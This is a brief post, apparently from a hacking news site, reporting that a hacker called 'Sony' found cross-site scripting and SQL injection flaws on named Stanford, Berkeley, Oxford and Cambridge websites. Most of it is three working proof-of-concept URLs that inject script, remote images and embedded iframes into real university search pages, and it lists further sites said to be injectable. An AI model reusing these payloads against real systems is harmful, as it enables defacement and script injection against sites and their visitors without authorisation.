Stanford,Berkeley and Oxford University sites vulnerable to XSS and SQLi
A Hacker named as "Sony" discovered XSS and SQLi vulnerability in Stanford, Berkeley and Oxford University websites.
Vulnerable sites:
- http://www-psearch.slac.stanford.edu (Vulnerable to XSS)
- http://www.univ.ox.ac.uk (Vulnerable to XSS)
- https://iris.eecs.berkeley.edu (Vulnerable to XSS)
- http://www.begbroke.ox.ac.uk (Vulnerable to Sqli)
- http://halbook.trinhall.cam.ac.uk (Vulnerable to Sqli)
Poc for Standford Univ:
http://www-psearch.slac.stanford.edu/SLACSearch/app/slac/index?qt=%22%3E%3Cscript%3Ealert%28%22.%22%29%3C/script%3E%3E%3Cimg%20src=http://www.gifs.net/Animation11/Computers_and_Technology/Gears/In_the_head.gif%20align=center%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/J04lTwix8yA%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/pred/bum/buk/letter88.jpg%22%3E
Screenshot:
Standford university vulnerability |
Poc for berkeley:
https://iris.eecs.berkeley.edu/cgi-bin/search.cgi?query=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Berkeley Vulnerability |
Poc for Oxford:
http://www.univ.ox.ac.uk/search.php?keys=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/pred/bum/buk/letter45.jpg%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%20by%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/NerGuAfjDow%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E
Oxford Univ Vulnerability |